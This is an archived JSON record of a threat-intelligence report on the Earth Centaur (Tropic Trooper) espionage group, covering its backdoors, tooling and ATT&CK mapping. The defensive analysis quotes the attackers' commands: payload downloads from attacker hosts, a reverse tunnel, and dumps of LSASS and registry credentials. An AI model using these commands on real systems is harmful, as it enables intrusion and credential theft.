{ "id": "9442b635-06cd-4989-89ed-099c99d8ec96", "created_at": "2026-04-06T00:12:28.77094Z", "updated_at": "2026-04-10T03:33:20.032626Z", "deleted_at": null, "sha1_hash": "d29ffab19faa011ce3afc093ff0b087f3f33763f", "title": "Tropic Trooper Targets Transportation and Government Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3495809, "plain_text": "Tropic Trooper Targets Transportation and Government\r\nOrganizations\r\nBy By: Nick Dai, Ted Lee, Vickie Su Dec 14, 2021 Read time: 11 min (3068 words)\r\nPublished: 2021-12-14 · Archived: 2026-04-05 15:11:54 UTC\r\nAPT \u0026 Targeted Attacks\r\nCollecting In the Dark: Tropic Trooper Targets Transportation and Government\r\nOur long-term monitoring of the cyberespionage group Earth Centaur (aka Tropic Trooper) shows that the threat\r\nactors are equipped with new tools and techniques. The group seems to be targeting transportation companies and\r\ngovernment agencies related to transportation.\r\nEarth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been\r\nactive since 2011. In July 2020, we noticed interesting activity coming from the group, and we have been closely\r\nmonitoring it since. The actors seem to be targeting organizations in the transportation industry and government\r\nagencies related to transport. \r\nWe observed that the group tried to access some internal documents (such as flight schedules and documents for\r\nfinancial plans) and personal information on the compromised hosts (such as search histories).  Currently, we have\r\nnot discovered substantial damage to these victims as caused by the threat group. However, we believe that it will\r\ncontinue collecting internal information from the compromised victims and that it is simply waiting for an\r\nopportunity to use this data.\r\nThrough long-term monitoring, we learned that this threat group is proficient at red teamwork. The group knows\r\nhow to bypass security settings and keep its operation unobstructive. Depending on the target, it uses backdoors\r\nwith different protocols, and it can also use the reverse proxy to bypass the monitoring of network security\r\nsystems. The usage of the open-source frameworks also allows the group to develop new backdoor\r\nvariants efficiently. We expand on these techniques and other capabilities in the following sections.  \r\nMore importantly, we believe the activities we observed are just the tip of the iceberg and their targets might\r\nbe expanded to other industries that are related to transportation. It is our aim, through this article, to\r\nencourage enterprises to review their own security setting and protect themselves from damage and compromise. \r\nOverview of Earth Centaur’s infection chain\r\nBased on our investigation, we found that the intrusion process used by Earth Centaur can be separated into\r\nseveral stages, which are shown in Figure 1.\r\nWe found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server\r\nvulnerabilities as entry points, and then installed web shells. Afterward, the .NET loader (detected as Nerapack)\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 1 of 15\n\nand the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the\r\ncompromised machine. Then, depending on the victims, the threat actors dropped different types of second-stage\r\nbackdoors, such as ChiserClient and SmileSvr.\r\nAfter exploiting the victim's environments successfully, the threat actors start Active Directory (AD) discovery\r\nand spread their tools via Server Message Block (SMB). Then, they use intranet penetration tools to build the\r\nconnection between the victim’s intranet and their command-and-control (C\u0026C) servers. We go into further detail\r\nabout these stages in our analysis. \r\nFigure 1. Stages of Earth Centaur’s intrusion process\r\nTechnical Analysis of Earth Centaur’s Tools and Techniques\r\nStage 1: Loaders\r\nAfter the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use\r\nbitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin).\r\nC:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"\u0026{Import-Module BitsTransfer;\r\nStart-BitsTransfer 'http://\u003credacted\u003e:8000/dfmanager.exe' \"%temp%/dfmanager.exe\"}\"\r\nC:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"\u0026{Import-Module BitsTransfer;\r\nStart-BitsTransfer 'http://\u003credacted\u003e:8000/dfmanager.bin' \"C:\\Users\\\r\n\u003credacted\u003e\\AppData\\Local\\Temp/dfmanager.bin\"}\"\r\nAfter our long-term monitoring, we observed that there are two different decryption algorithms (DES or AES)\r\nused in Nerapack to decrypt the payload. Moreover, in its newer version, it uses a technique called\r\n“Timestomping.” Timestomping is when the timestamp of the payload file (.bin) is altered to make it harder for\r\nincident response analysts to find it.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 2 of 15\n\nFigure 2. Timestomping used on the bin file\r\nThe decryption key is used as an argument of Nerapack and various keys are used on different victims. It is a\r\nsimple but effective technique that makes security analysis more difficult and also ensures that only their operators\r\ncan use the tools.\r\nThe command for execution is shown as here:\r\n\u003e Nerapack.exe {base64 encoded key}\r\nFortunately, we were still able to collect the decryption key in some cases and we decrypted the payload\r\nsuccessfully. Based on our current cases, the decrypted payload is Quasar RAT. After the payload is deployed, the\r\nactors can continue further malicious actions through Quasar RAT.\r\nStage 2: Backdoors\r\nAfter further analysis, we found that the threat group developed multiple backdoors capable of communication via\r\ncommon network protocols. We think this indicates that it has the capability to bypass network security systems\r\nby using these common protocols to transfer data. We also found that the group tries to launch various backdoors\r\nper victim. Furthermore, it also tends to use existing frameworks to make customized backdoors. By using\r\nexisting frameworks, examples of which are detailed in the following, it builds new backdoor variants more\r\nefficiently.\r\nChiserClient\r\nAfter the backdoor is launched, it will decrypt the embedded C\u0026C configuration via AES (CTR mode) algorithm\r\nfor the following connection. In the configuration, there are three C\u0026C addresses and corresponding port\r\nnumbers.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 3 of 15\n\nFigure 3. Decrypted C\u0026C configuration\r\nIn the first connection, ChiserClient will append the host name of the compromised host for check-in purposes.\r\nThen, it will keep running on the hosts and wait for further commands from the C\u0026C server.\r\nChiserClient is installed as a system service to allow the threat actors access to higher privileges and keep\r\npersistence on the compromised host. The capability of ChiserClient is shown in the following table:\r\nCommand code Function\r\n0x10001 Write specified file\r\n0x10002 Download File\r\n0x10003 Read specified file\r\n0x10004 No Action\r\n0x10005 Open a command shell for command execution\r\nHTShell\r\nHTShell is a simple backdoor that is developed using the Mongoose framework (version 6.15). Mongoose is an\r\nObject Data Modeling (ODM) library for MongoDB and Node.Js. It is used to translate between objects in code\r\nand objects representation in MongoDB.\r\nWe saw in our cases that the HTShell client will be launched as a system service on the compromised machine and\r\nthat it will connect to a C\u0026C server. HTShell supports importing additional config files. We found that the\r\nadditional config file is located in %PUBLIC%\\Documents\\sdcsvc.dat, and that the content should be encoded by\r\nbase64. If no config file is imported, it will connect to the predefined C\u0026C address.\r\nFigure 4. HTShell hardcoded C\u0026Cs\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 4 of 15\n\nHTShell encodes a hard\r\n-coded string, \"tp===\" with custom base64 and embeds the encoded string in the request\r\ncookies. If the C\u0026C server receives the request with the special cookie value, it can verify that the request comes\r\nfrom its client applications.\r\nFigure 5. HTShell hardcoded and encoded cookie string in the request header\r\nThe response handler of HTShell will use “`” as delimiter to split the command code and argument for the\r\nreceived command. Hence, the command will be this format: \r\n\u003ccommand code\u003e`\u003ccustom-base64encoded-data\u003e[`\u003cmore-custom-base64encoded-data\u003e]\r\nHTShell currently supports three different backdoor functions, shown here:\r\nCommand code Function\r\n0 Open a command shell for command execution\r\n1 Upload file\r\n2 Download file\r\nCustomized Lilith RAT\r\nDuring our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith\r\nRAT. We think that this Lilith RAT is a highly modified version of the open-source Lilith RATopen on a new tab.\r\nThe actors reused part of the codes for command execution, while the C\u0026C protocol is changed to Dropbox\r\nHTTPS APIs.\r\nFigure 6. Reused codes from open-source Lilith RAT\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 5 of 15\n\nIn order to launch this RAT, the threat actors use a technique called \"Phantom DLL hijacking.\" In this technique,\r\nthe RAT will be disguised as the normal wlbsctrl.dll. While the Windows service “IKEEXT” is starting, the fake\r\nwlbsctrl.dll is loaded and executed with high privilege. Furthermore, when Lilith RAT is terminated, it will try to\r\nclean itself to prevent being found by investigators.\r\nFigure 7. Self-deletion after execution\r\nFor the C\u0026C connections, the customized Lilith RAT will first check in to the attacker’s Dropbox and see if the\r\nvictim host exists. If not, the hostname and IP address will be collected and appended to the existing compromised\r\nhosts’ information. All data will then be encrypted and sent back.\r\nFigure 8. The first check-in request to the Dropbox C\u0026C\r\nAfter the check-in request, the backdoor will start to wait for more commands to come in. All the request data are\r\nformatted to JSON, and they are encrypted by AES and encoded by base64.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 6 of 15\n\nHere is a list of the C\u0026C commands:\r\nCommand Description\r\nCMDCommand Executes commands\r\nDownloadCloudFile Downloads files\r\nUploadCloudFile Uploads files\r\nGetDir Lists directories\r\nGetDirFile Lists files in a directory\r\nDeleteSelf Deletes itself\r\nSmileSvr\r\nWe found that there are two types of SmileSvr. The difference between the two variants is the protocol used for\r\ncommunication: ICMP and SSL. The threat actors will use an installer to install SmileSvr as a system service and\r\ndrop a DAT file that contains encoded C\u0026C information. In the configuration file, the memory size used for\r\nstoring C\u0026C address and C\u0026C address will be defined.\r\nFigure 9. Encrypted configuration file\r\nThe ICMP version of SmileSvr will create an ICMP socket to connect to the specified C\u0026C address, which is\r\ndefined in a configuration file. In each SmileSvr, there is an embedded number (e.g., 10601 in Figure 10.) and this\r\nvalue will be used as sequence number in the sent ICMP packet. We think attackers use this value to verify if the\r\nincoming packet belongs to their backdoor and filter out the noise.\r\nFigure 10. Decrypted configuration file\r\nWithout knowing the real traffic from the C\u0026C server, we can only speculate on the content of the response based\r\non the receiving function. As shown in Figure 11, the content of the response should contain the sequence number\r\nused to verify if the received data comes from the correct source and two blocks of encrypted data.\r\nThe data decryption procedure is as follows:\r\n1. First, the encrypted data is decrypted with a one-byte XOR key (0xFF).\r\n2. The first of the decrypted content contains a magic number used to check data in the second block, a\r\ncommand code, and the XOR key to decrypt the second set of encrypted content.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 7 of 15\n\n3. The second set of encrypted content is decrypted with an XOR key (0x99) from the previous decrypted\r\ncontent, and within the decrypted data are instructions for the following procedures.\r\nFigure 11. SmileSvr packet traffic format simulation\r\nWhile analyzing samples, we found that the C\u0026C server was already inactive. Without knowing the traffic\r\nbetween SmileSvr and C\u0026C server, we could not fully understand all functions. However, most of the backdoor\r\nfunctions are listed here:\r\nCommand code Function\r\n0x5001 Opens/Reads specified file\r\n0x5002 Unknown\r\n0x5004 Opens/Writes specified file\r\n0x5006 Opens command shell\r\n0x5007 Unknown\r\n0x5009 Closes command shell\r\n0x500A File System Traversal\r\n0x500C Checks environment information\r\n0x500E Unknown\r\nAs for the SSL version of SmileSvr, the capability of SSL communication is built by using wolfSSL, which is a\r\nlightweight, C-language based SSL/TLS library. The backdoor functions of SSL version SmileSvr are similar to\r\nthe ICMP ones. The threat actors just use it to develop new ways to support data transfer via an encrypted channel.\r\nCustomized Gh0st RAT\r\nIn our investigation, we also found a suspicious executable named telegram.exe. After analyzing the file, we found\r\nthat it was a customized version of Gh0st RAT. Compared to the original Gh0st RAT (Gh0st beta 3.6), the\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 8 of 15\n\ndifference is that the customized version supports a new function to discover information from active sessions on\r\nthe host.\r\nAll supported functions for the customized Gh0st are shown in the following table:\r\nCommand code Function\r\n0xC8 Terminates connection\r\n0xCA File manager to handle file operations\r\n0xCB Screen monitoring\r\n0xCC Opens remote shell for command execution\r\n0XD5 Gets active session information\r\nPost-Exploitation\r\nAfter successfully exploiting the vulnerable system, the threat actor will use multiple hacking tools to discover\r\nand compromise machines on the victim’s intranet. In this stage, we also observed attempts to deploy tools to\r\nexfiltrate stolen information.\r\nDuring our investigation, we found evidence of specific tools, which we listed in Table 1. With these tools, the\r\nattackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.\r\nTool name Purpose Description\r\nSharpHound AD Discovery Discovery tool to understand the relationship in an AD environment\r\nFRPC\r\nIntranet\r\nPenetration\r\nFast reverse proxy to help expose a local server behind a NAT or firewall\r\nto the internet\r\nChisel\r\nIntranet\r\nPenetration\r\nFast TCP/UDP tunnel\r\nRClone Exfiltration\r\nA command-line program to sync files and directories to and from\r\ndifferent cloud storage providers\r\nCredential Dumping\r\nWe also observed that the group used multiple legitimate tools to dump credentials on compromised machines. It\r\nmade good use of these tools to achieve its goal and keep its operation hidden and unobstructive.\r\nFor example, the group uses ProcDump.exe (a tool from Windows Sysinternals Suite that creates dumps of the\r\nprocesses in any scenario), which it renamed bootsys.exe:\r\nc:\\users\\public\\downloads\\bootsys.exe  -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 9 of 15\n\nThe group dumps credentials stored in registries by using reg.exe:\r\nreg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive\r\nreg.exe save hklm\\sam c:\\windows\\temp\\sa.dit\r\nreg.exe save hklm\\security c:\\windows\\temp\\se.dit\r\nreg.exe save hklm\\system c:\\windows\\temp\\sy.dit\r\nThe group would also dump memory from the specified process by using comsvcs.dll:\r\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full\r\nIndicator Removal\r\nTo avoid exposing their footprints to investigators, the threat actors made their own tool to wipe out the event logs\r\non the victimized machine. By using this tool, they could clean specified event logs and make it hard for\r\ninvestigators to track their operations.\r\nThe usage is as follows:\r\nIntranet Penetration\r\nAfter successfully exploiting the vulnerable system, threat actors also drop following tools: FRP and Chisel. FRP\r\nis a fast reverse proxy used to expose a local server behind an NAT or a firewall to the internet. It can read\r\npredefined configurations and make the host in the intranet available to users from the internet.\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 10 of 15\n\nFigure 12. Configuration for FRP fast reverse proxy\r\nChisel is a fast TCP/UDP tunnel, which is mainly used for passing through firewalls. It provides the capability to\r\ntransport data over HTTP (secured via Secure Shell, aka SSH) and allows threat actors to pass through a firewall\r\nand get access to the machine behind the firewall.\r\nThis is used to download reverse proxy Chisel via PowerShell:\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object\r\nSystem.Net.WebClient).DownloadFile('https[:]//webadmin[.]mirrorstorage[.]org/ch.exe', 'ch.exe')\"\r\nThis is used to build a connection between inter/intranet via Chisel:\r\nC:\\WINDOWS\\system32\\ch.exe client https[:]//webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks\r\nExfiltration\r\nIn the previous phase, we observed that the actors use several tools to get the whole picture of the network\r\ninfrastructure and bypass the firewall. Afterward, we observed a PowerShell command used to download an\r\neffective tool, Rclone, which is used for exfiltration. It also provides an easy and effective way of copying data to\r\nseveral cloud storage providers.\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object\r\nSystem.Net.WebClient).DownloadFile('http://195[.]123[.]221[.]7:8080/rclone.exe', 'r.exe')\"\r\nBased on previous experience, Rclone has frequently been used in ransomware attacks to exfiltrate stolen data.\r\nHowever, it seems that currently, it is not only used in ransomware attacks but also in APT attacks.\r\nIdentifying Features in the Earth Centaur Campaign\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 11 of 15\n\nAfter long-term observation and analysis of the attack campaigns, there was compelling evidence that they were\r\noperated by Earth Centaur. We found several identifying features of the threat actors within the techniques and\r\ntools described in the preceding sections, and we break down the factors in the following.\r\nMutex Style\r\nWe found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.\r\nThe decoded string is shown in Table 2. Based on these special mutex strings, we believe the threat actors come\r\nfrom a Chinese-speaking region.\r\nTable 2. Encoded/Decoded mutex string\r\nEncoded string Decoded string in Chinese English translation\r\nvul3ru,6q8 q8 y.3 小傑趴趴走 Jack goes around\r\nji394su3 我愛你 I love you\r\n5ji fu.6cl3g.3zj6m0694 桌球好手福原愛 Excellent table tennis player, Ai Fukuhara\r\nConfiguration style\r\nAfter analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient\r\nmentioned in our previous research on Earth Centaur.\r\nFigure 13. Network configuration (Left: ChiserClient Right: TClient)\r\nCode Similarity\r\nAfter checking the backdoor SmileSvr, we found that there was a code similarity between it and\r\nTroj_YAHAMAM, which was used by Earth Centaur in an earlier operationopen on a new tab. Both share similar\r\ncodes in configuration decoding, which is shown in Figure 14. Furthermore, the delimiter that was used in\r\nSmileSvr to split different values in configuration files is the same as the one used in YAHAMAM (shown as\r\nFigure 15).\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 12 of 15\n\nFigure 14. Configuration decoding function (left: SmileSvr right: Troj_Yahamam)\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 13 of 15\n\nFigure 15. Function used to split different values in configuration file (left: SmileSvr right:\r\nTroj_Yahamam)\r\nConclusion\r\nThese threat actors are notably sophisticated and well-equipped. Looking deeper into the new methods the group\r\nuses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while\r\nremaining under the radar. For example, the group can map their target’s network infrastructure and bypass\r\nfirewalls. It uses backdoors with different protocols, which are deployed depending on the victim. It also has the\r\ncapability to develop customized tools to evade security monitoring in different environments, and it exploits\r\nvulnerable websites and uses them as C\u0026C servers. \r\nIn this blog, we outlined our new findings related to these threat actors to help possible targets in the\r\ntransportation and other industries. Information on how a threat enters and operates within a victim’s network is\r\ninvaluable to security teams and can help them create more effective protection for vulnerable organizations.\r\nOrganizations can also find capable security solutions that can help interpret and respond to malicious activities,\r\ntechniques, and movements before the threat can culminate and affect an enterprise. Trend Micro Vision One™️\r\nwith Managed XDRproducts gives security teams a consolidated view into valuable insights so they can organize\r\na more solid line of defense ahead of attacks.\r\nFor a list of the Indicators of Compromise, please see this document.open on a new tab \r\nMITRE ATT\u0026CK Matrix\r\nTactics ID Technique\r\nInitial access T1190 Exploit public-facing application\r\nExecution\r\nT1059.001 Command and Scripting Interpreter: PowerShell\r\nT1059.003 Command and scripting interpreter: Windows Command Shell\r\nT1569.002 System Services: Service Execution\r\nPersistence\r\nT1543.003 Create or Modify System Process: Windows Service\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1505.003 Server Software Component: Web Shell\r\nDefense evasion T1140 Deobfuscate/Decode Files or Information\r\nT1480 Execution Guardrails\r\nT1574.002 Hijack Execution Flow: DLL Side-Loading\r\nT1070.001 Indicator Removal on Host: Clear Windows Event Logs\r\nT1027.002 Obfuscated Files or Information: Software Packing\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 14 of 15\n\nT1218.011 Signed Binary Proxy Execution: Rundll32\r\nT1036.005 Masquerading: Match Legitimate Name or Location\r\nT1197 BITS Jobs\r\nT1070.006 Indicator Removal on Host: Timestomp\r\nCredential Access\r\nT1003.001 OS Credential Dumping: LSASS Memory\r\nT1552.002 OS Credential Dumping: Credentials in Registry\r\nLateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares\r\nDiscovery\r\nT1087.002 Account Discovery: Domain Account\r\nT1482 Domain Trust Discovery\r\nT1083 File and Directory Discovery\r\nCollection T1005 Data from Local System\r\nCommand and control \r\nT1071.001 Application layer protocol: web protocols\r\nT1095 Non-Application layer protocol\r\nT1090.001 Proxy: Internal Proxy\r\nExfiltration T1567.002 Exfiltration to Cloud Storage\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organiza\r\ntions.html\r\nhttps://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html\r\nPage 15 of 15\n\nCustomized Gh0st In our investigation, RAT we also found a suspicious executable named telegram.exe. After analyzing the file, we found\nthat it was a customized version of Gh0st RAT. Compared to the original Gh0st RAT (Gh0st beta 3.6), the\n Page 8 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html" ], "report_names": [ "collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html" ], "threat_actors": [ { "id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc", "created_at": "2023-01-06T13:46:38.354607Z", "updated_at": "2026-04-10T02:00:02.939761Z", "deleted_at": null, "main_name": "APT23", "aliases": [ "BRONZE HOBART", "G0081", "Red Orthrus", "Earth Centaur", "PIRATE PANDA", "KeyBoy", "Tropic Trooper" ], "source_name": "MISPGALAXY:APT23", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bef7800a-a08f-4e21-b65c-4279c851e572", "created_at": "2022-10-25T15:50:23.409336Z", "updated_at": "2026-04-10T02:00:05.319608Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "Tropic Trooper", "Pirate Panda", "KeyBoy" ], "source_name": "MITRE:Tropic Trooper", "tools": [ "USBferry", "ShadowPad", "PoisonIvy", "BITSAdmin", "YAHOYAH", "KeyBoy" ], "source_id": "MITRE", "reports": null }, { "id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724", "created_at": "2022-10-25T16:07:24.344358Z", "updated_at": "2026-04-10T02:00:04.947834Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "APT 23", "Bronze Hobart", "Earth Centaur", "G0081", "KeyBoy", "Operation Tropic Trooper", "Pirate Panda", "Tropic Trooper" ], "source_name": "ETDA:Tropic Trooper", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "ByPassGodzilla", "CHINACHOPPER", "CREDRIVER", "China Chopper", "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "KeyBoy", "Neo-reGeorg", "PCShare", "POISONPLUG.SHADOW", "Poison Ivy", "RoyalRoad", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Swor", "TSSL", "USBferry", "W32/Seeav", "Winsloader", "XShellGhost", "Yahoyah", "fscan", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "86182dd7-646c-49c5-91a6-4b62fd2119a7", "created_at": "2025-08-07T02:03:24.617638Z", "updated_at": "2026-04-10T02:00:03.738499Z", "deleted_at": null, "main_name": "BRONZE HOBART", "aliases": [ "APT23", "Earth Centaur ", "KeyBoy ", "Pirate Panda ", "Red Orthrus ", "TA413 ", "Tropic Trooper " ], "source_name": "Secureworks:BRONZE HOBART", "tools": [ "Crowdoor", "DSNGInstaller", "KeyBoy", "LOWZERO", "Mofu", "Pfine", "Sepulcher", "Xiangoop Loader", "Yahaoyah" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434348, "ts_updated_at": 1775792000, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.pdf", "text": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.txt", "img": "https://archive.orkl.eu/d29ffab19faa011ce3afc093ff0b087f3f33763f.jpg" } }